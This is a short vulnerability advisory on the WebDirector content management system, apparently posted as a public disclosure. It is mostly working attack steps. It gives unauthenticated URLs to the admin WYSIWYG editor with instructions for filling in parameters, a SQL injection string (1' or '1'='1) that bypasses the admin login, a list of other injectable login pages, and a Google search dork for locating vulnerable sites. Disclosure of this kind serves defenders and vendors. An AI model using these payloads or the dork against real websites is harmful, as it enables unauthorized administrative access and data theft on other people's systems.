WebDirector suffers from administrative bypass and remote SQL injection vulnerabilities.
719b9c1df0e82a264cec5e497c0b149dae5c0c1056c391bea6818f92188217bd
WEBDIRECTOR SQL & Admin ByPass Vulnerabilities
WebDirector is a dynamic, self managed website solution with everything your business needs. (CMS)
Vendor: http://www.corporateinteractive.com.au/
Demo: http://demo.webdirector.net.au/
Credit: DoZ
1. WYSIWIG Editor Admin ByPass
(WYSIWIG Editor) Pages Not Admin Protect
jsp/FCK/editor.jsp?colNum=#&id=#&module=SOMETHING&formName=updateForm.jsp&colName=ATTRLONG_Template_PageHeader&tableType=Elements
jsp/FCK/editor.jsp?colNum=#&id=#&module=SOMETHING&formName=updateForm.jsp&colName=ATTRLONG_Template_PageFooter&tableType=Elements
Change "#" to Number
Change "SOMETHING" to correct category
2. Admin SQL: loginAdmin.jsp
Admin: 1' or '1'='1
Pass: 1' or '1'='1
3. Standard Business Edition SQL
/client/SecureLogonModule_V2.00/c_secureLogin.jsp
Date: Discovered October 2011
Researchers Note: WebDirector Iphone Edition is Prone to SQl attack also. There are also scripts such as
/SBE/client/TimeSheet/c_tslogin.jsp that suffer from SQL Injection and more bugs may still be undiscovered.
Vendor has been contacted and is working on issue.
Google Dork Iphone Ver: ext:jsp inurl:(c_secureLogin)